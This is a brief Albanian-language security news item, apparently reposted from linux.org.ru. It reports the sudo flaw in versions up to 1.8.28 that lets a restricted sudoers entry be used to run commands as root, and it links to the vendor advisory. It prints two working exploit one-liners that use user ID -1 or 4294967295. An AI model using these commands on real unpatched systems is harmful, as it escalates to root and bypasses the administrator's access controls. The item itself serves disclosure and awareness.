Një gabim në sudo lejon që të ekzekutohet nga përdoruesi root çdo skedar ekzekutues, nëse në /etc/sudoers lejohet ekzekutimi i tij nga përdorues të tjerë dhe ndalohet për root.
Shfrytëzimi i gabimit është shumë i thjeshtë:
sudo -u#-1 id -u
ose:
sudo -u#4294967295 id -u
Gabimi është prezent në të gjitha versionet e sudo deri në 1.8.28
Detaje:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Burimi: linux.org.ru
